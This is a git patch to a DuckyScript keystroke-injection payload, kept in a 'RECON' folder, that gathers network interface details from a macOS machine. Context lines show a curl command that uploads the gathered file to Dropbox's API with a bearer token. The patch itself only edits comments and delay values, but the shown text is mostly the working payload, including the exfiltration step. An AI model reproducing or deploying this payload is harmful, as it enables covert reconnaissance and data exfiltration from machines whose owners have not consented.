From 71c1f299416781acbe395350b9891f3e372fc994 Mon Sep 17 00:00:00 2001 From: Narsty Date: Mon, 5 Jun 2023 19:57:58 -0500 Subject: [PATCH] Network Recon to Dropbox .txt --- RECON/Network Recon to Dropbox .txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/RECON/Network Recon to Dropbox .txt b/RECON/Network Recon to Dropbox .txt index b27cd96..63865ad 100644 --- a/RECON/Network Recon to Dropbox .txt +++ b/RECON/Network Recon to Dropbox .txt @@ -1,8 +1,7 @@ REM Network Recon and Cloud Sync Automation REM This script gathers network information from a macOS system REM then uploads it to Dropbox for easy synchronization and analysis. -REM Run this script to capture network interface details and save them in a text file. The file is then uploaded to Dropbox for secure storage and accessibility. - +REM Replace "" with your actual API access token. line 25 REM Title: Network Recon to Dropbox REM Author: Narsty @@ -24,7 +23,8 @@ DELAY 1000 ENTER DELAY 500 STRING curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/Backup/network_interfaces.txt\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @"$HOME/Desktop/network_interfaces.txt" -DELAY 4000 +DELAY 2000 ENTER +DELAY 5000 GUI w